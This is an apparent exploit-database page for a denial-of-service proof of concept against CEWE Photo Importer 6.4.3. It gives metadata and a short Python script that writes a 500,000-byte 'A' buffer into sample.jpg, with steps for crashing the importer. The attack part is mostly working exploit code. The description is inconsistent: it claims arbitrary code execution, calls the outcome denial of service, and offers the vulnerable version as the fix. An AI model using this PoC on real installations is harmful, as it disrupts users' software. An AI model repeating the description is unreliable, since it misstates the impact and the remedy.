header-logo
Suggest Exploit
vendor:
CEWE Photo Importer
by:
Alejandra Sánchez
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: CEWE Photo Importer
Affected Version From: 6.4.3
Affected Version To: 6.4.3
Patch Exists: YES
Related CWE: N/A
CPE: a:cewe_photoworld:cewe_photo_importer
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2019

CEWE PHOTO IMPORTER 6.4.3 – Denial of Service (PoC)

The vulnerability exists due to a boundary error when processing a specially crafted .jpg file. A remote attacker can create a specially crafted .jpg file, trick the victim into importing it, and execute arbitrary code on the system. This can result in a denial of service condition.

Mitigation:

Update to the latest version of CEWE PHOTO IMPORTER 6.4.3 or later.
Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: CEWE PHOTO IMPORTER 6.4.3 - Denial of Service (PoC)
# Date: 16/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://cewe-photoworld.com/
# Software: https://cewe-photoworld.com/creator-software/windows-download
# Version: 6.4.3
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script 'photoimporter.py',it will create a new file "sample.jpg"
# 2.- Open CEWE PHOTO IMPORTER
# 3.- Select the 'sample.jpg' file created and click 'Import all'
# 4.- Click 'Next' and 'Next', you will see a crash

buffer = "\x41" * 500000

f = open ("sample.jpg", "w")
f.write(buffer)
f.close()